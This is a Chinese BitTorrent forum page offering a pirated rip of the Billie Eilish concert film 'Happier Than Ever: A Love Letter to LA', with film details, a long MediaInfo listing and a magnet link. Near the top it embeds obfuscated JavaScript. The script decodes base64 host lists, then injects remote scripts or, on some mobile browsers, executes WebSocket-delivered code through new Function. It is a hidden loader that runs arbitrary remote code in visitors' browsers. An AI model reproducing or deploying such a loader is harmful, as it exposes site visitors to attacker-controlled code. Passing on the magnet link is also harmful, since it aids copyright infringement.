比以往任何时候都更快乐:写给洛杉矶的情书[中文字幕].2021.1080p.DSNP.WEB-DL.DDP5.1.Atmos.H264 3.66GB

版主小s 12天前 371

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 比以往任何时候都更快乐:写给洛杉矶的情书 / Happier Than Ever: A Love Letter to LA

◎片 名 Happier than Ever: A Love Letter to Los Angeles

◎年 代 2021

◎产 地 美国

◎类 别 短片 / 音乐

◎语 言 英语

◎上映日期 2021-09-03(美国)

◎IMDb链接 https://www.imdb.com/title/tt15094392/

◎豆瓣链接 https://movie.douban.com/subject/35568405/

◎导 演 罗伯特·罗德里格兹 Robert Rodriguez (id:1019016)

帕特里克·奥斯本 Patrick Osborne (id:1351406)

◎演 员 碧丽·艾莉许 Billie Eilish (id:1431245)

菲尼亚斯·奥康奈尔 Finneas O'Connell (id:1431179)

◎标 签 纪录片 / 音乐 / 美国 / 现场

◎简 介

You’ve never experienced a concert like this.

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 304977181430477110129171089776992670573 (0xE57077F6A3D5E9B6B23558A7D57D536D)

  4. Complete name : Happier.Than.Ever.Lettre.da[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 3.66 GiB

  8. Duration : 1 h 5 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 7 981 kb/s

  11. Encoded date : UTC 2021-09-12 14:37:30

  12. Writing application : mkvmerge v61.0.0 ('So') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  14. Video

  15. ID : 1

  16. Format : AVC

  17. Format/Info : Advanced Video Codec

  18. Format profile : [email protected]

  19. Format settings : CABAC / 4 Ref Frames

  20. Format settings, CABAC : Yes

  21. Format settings, Reference frames : 4 frames

  22. Codec ID : V_MPEG4/ISO/AVC

  23. Duration : 1 h 5 min

  24. Bit rate mode : Variable

  25. Bit rate : 7 210 kb/s

  26. Maximum bit rate : 12.7 Mb/s

  27. Width : 1 920 pixels

  28. Height : 1 080 pixels

  29. Display aspect ratio : 16:9

  30. Frame rate mode : Constant

  31. Frame rate : 24.000 FPS

  32. Color space : YUV

  33. Chroma subsampling : 4:2:0

  34. Bit depth : 8 bits

  35. Scan type : Progressive

  36. Bits/(Pixel*Frame) : 0.145

  37. Stream size : 3.31 GiB (90%)

  38. Default : No

  39. Forced : No

  40. Color range : Limited

  41. Color primaries : BT.709

  42. Transfer characteristics : BT.709

  43. Matrix coefficients : BT.709


  44. Audio

  45. ID : 2

  46. Format : E-AC-3 JOC

  47. Format/Info : Enhanced AC-3 with Joint Object Coding

  48. Commercial name : Dolby Digital Plus with Dolby Atmos

  49. Codec ID : A_EAC3

  50. Duration : 1 h 5 min

  51. Bit rate mode : Constant

  52. Bit rate : 768 kb/s

  53. Channel(s) : 6 channels

  54. Channel layout : L R C LFE Ls Rs

  55. Sampling rate : 48.0 kHz

  56. Frame rate : 31.250 FPS (1536 SPF)

  57. Compression mode : Lossy

  58. Stream size : 361 MiB (10%)

  59. Title : English

  60. Language : English

  61. Service kind : Complete Main

  62. Default : Yes

  63. Forced : No

  64. Complexity index : 16

  65. Number of dynamic objects : 15

  66. Bed channel count : 1 channel

  67. Bed channel configuration : LFE


  68. Text #1

  69. ID : 3

  70. Format : UTF-8

  71. Codec ID : S_TEXT/UTF8

  72. Codec ID/Info : UTF-8 Plain Text

  73. Duration : 1 h 5 min

  74. Bit rate : 4 b/s

  75. Count of elements : 50

  76. Stream size : 2.29 KiB (0%)

  77. Title : Svenska

  78. Language : Swedish

  79. Default : Yes

  80. Forced : Yes


  81. Text #2

  82. ID : 4

  83. Format : UTF-8

  84. Codec ID : S_TEXT/UTF8

  85. Codec ID/Info : UTF-8 Plain Text

  86. Duration : 1 h 5 min

  87. Bit rate : 4 b/s

  88. Count of elements : 50

  89. Stream size : 2.13 KiB (0%)

  90. Title : Suomi

  91. Language : Finnish

  92. Default : Yes

  93. Forced : Yes


  94. Text #3

  95. ID : 5

  96. Format : UTF-8

  97. Codec ID : S_TEXT/UTF8

  98. Codec ID/Info : UTF-8 Plain Text

  99. Duration : 1 h 5 min

  100. Bit rate : 59 b/s

  101. Count of elements : 744

  102. Stream size : 28.6 KiB (0%)

  103. Title : Português (Brasil)

  104. Language : Portuguese

  105. Default : Yes

  106. Forced : Yes


  107. Text #4

  108. ID : 6

  109. Format : UTF-8

  110. Codec ID : S_TEXT/UTF8

  111. Codec ID/Info : UTF-8 Plain Text

  112. Duration : 1 h 5 min

  113. Bit rate : 4 b/s

  114. Count of elements : 48

  115. Stream size : 2.03 KiB (0%)

  116. Title : Português

  117. Language : Portuguese

  118. Default : Yes

  119. Forced : Yes


  120. Text #5

  121. ID : 7

  122. Format : UTF-8

  123. Codec ID : S_TEXT/UTF8

  124. Codec ID/Info : UTF-8 Plain Text

  125. Duration : 1 h 5 min

  126. Bit rate : 57 b/s

  127. Count of elements : 738

  128. Stream size : 27.4 KiB (0%)

  129. Title : Polski

  130. Language : Polish

  131. Default : Yes

  132. Forced : Yes


  133. Text #6

  134. ID : 8

  135. Format : UTF-8

  136. Codec ID : S_TEXT/UTF8

  137. Codec ID/Info : UTF-8 Plain Text

  138. Duration : 1 h 5 min

  139. Bit rate : 4 b/s

  140. Count of elements : 47

  141. Stream size : 2.29 KiB (0%)

  142. Title : Norsk

  143. Language : Norwegian

  144. Default : Yes

  145. Forced : Yes


  146. Text #7

  147. ID : 9

  148. Format : UTF-8

  149. Codec ID : S_TEXT/UTF8

  150. Codec ID/Info : UTF-8 Plain Text

  151. Duration : 1 h 5 min

  152. Bit rate : 4 b/s

  153. Count of elements : 40

  154. Stream size : 1.91 KiB (0%)

  155. Title : Nederlands

  156. Language : Dutch

  157. Default : Yes

  158. Forced : Yes


  159. Text #8

  160. ID : 10

  161. Format : UTF-8

  162. Codec ID : S_TEXT/UTF8

  163. Codec ID/Info : UTF-8 Plain Text

  164. Duration : 1 h 5 min

  165. Bit rate : 58 b/s

  166. Count of elements : 767

  167. Stream size : 27.9 KiB (0%)

  168. Title : Korean

  169. Language : Korean

  170. Default : Yes

  171. Forced : Yes


  172. Text #9

  173. ID : 11

  174. Format : UTF-8

  175. Codec ID : S_TEXT/UTF8

  176. Codec ID/Info : UTF-8 Plain Text

  177. Duration : 1 h 5 min

  178. Bit rate : 112 b/s

  179. Count of elements : 666

  180. Stream size : 53.5 KiB (0%)

  181. Title : Japanese

  182. Language : Japanese

  183. Default : Yes

  184. Forced : Yes


  185. Text #10

  186. ID : 12

  187. Format : UTF-8

  188. Codec ID : S_TEXT/UTF8

  189. Codec ID/Info : UTF-8 Plain Text

  190. Duration : 1 h 5 min

  191. Bit rate : 4 b/s

  192. Count of elements : 48

  193. Stream size : 2.28 KiB (0%)

  194. Title : Italiano

  195. Language : Italian

  196. Default : Yes

  197. Forced : Yes


  198. Text #11

  199. ID : 13

  200. Format : UTF-8

  201. Codec ID : S_TEXT/UTF8

  202. Codec ID/Info : UTF-8 Plain Text

  203. Duration : 1 h 5 min

  204. Bit rate : 5 b/s

  205. Count of elements : 60

  206. Stream size : 2.65 KiB (0%)

  207. Title : Fran?ais

  208. Language : French

  209. Default : Yes

  210. Forced : Yes


  211. Text #12

  212. ID : 14

  213. Format : UTF-8

  214. Codec ID : S_TEXT/UTF8

  215. Codec ID/Info : UTF-8 Plain Text

  216. Duration : 1 h 5 min

  217. Bit rate : 56 b/s

  218. Count of elements : 744

  219. Stream size : 26.8 KiB (0%)

  220. Title : Espa?ol (Latinoamericano)

  221. Language : Spanish

  222. Default : Yes

  223. Forced : Yes


  224. Text #13

  225. ID : 15

  226. Format : UTF-8

  227. Codec ID : S_TEXT/UTF8

  228. Codec ID/Info : UTF-8 Plain Text

  229. Duration : 1 h 5 min

  230. Bit rate : 56 b/s

  231. Count of elements : 756

  232. Stream size : 26.9 KiB (0%)

  233. Title : Espa?ol

  234. Language : Spanish

  235. Default : Yes

  236. Forced : Yes


  237. Text #14

  238. ID : 16

  239. Format : UTF-8

  240. Codec ID : S_TEXT/UTF8

  241. Codec ID/Info : UTF-8 Plain Text

  242. Duration : 1 h 5 min

  243. Bit rate : 72 b/s

  244. Count of elements : 836

  245. Stream size : 34.8 KiB (0%)

  246. Title : English [CC]

  247. Language : English

  248. Default : Yes

  249. Forced : Yes


  250. Text #15

  251. ID : 17

  252. Format : UTF-8

  253. Codec ID : S_TEXT/UTF8

  254. Codec ID/Info : UTF-8 Plain Text

  255. Duration : 1 h 5 min

  256. Bit rate : 4 b/s

  257. Count of elements : 47

  258. Stream size : 2.21 KiB (0%)

  259. Title : Deutsch

  260. Language : German

  261. Default : Yes

  262. Forced : Yes


  263. Text #16

  264. ID : 18

  265. Format : UTF-8

  266. Codec ID : S_TEXT/UTF8

  267. Codec ID/Info : UTF-8 Plain Text

  268. Duration : 1 h 5 min

  269. Bit rate : 4 b/s

  270. Count of elements : 50

  271. Stream size : 2.25 KiB (0%)

  272. Title : Dansk

  273. Language : Danish

  274. Default : Yes

  275. Forced : Yes


  276. Text #17

  277. ID : 19

  278. Format : UTF-8

  279. Codec ID : S_TEXT/UTF8

  280. Codec ID/Info : UTF-8 Plain Text

  281. Duration : 1 h 5 min

  282. Bit rate : 51 b/s

  283. Count of elements : 767

  284. Stream size : 24.5 KiB (0%)

  285. Title : Chinese (Simplified)

  286. Language : Chinese

  287. Default : Yes

  288. Forced : Yes


  289. Text #18

  290. ID : 20

  291. Format : UTF-8

  292. Codec ID : S_TEXT/UTF8

  293. Codec ID/Info : UTF-8 Plain Text

  294. Duration : 1 h 5 min

  295. Bit rate : 51 b/s

  296. Count of elements : 767

  297. Stream size : 24.4 KiB (0%)

  298. Title : Chinese (Hong Kong)

  299. Language : Chinese

  300. Default : Yes

  301. Forced : Yes


TAGS 音乐 短片

磁力链:
  • magnet:?xt=urn:btih:236B9617E4C0DA59D458E2E9790E8CE34C5F1008
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回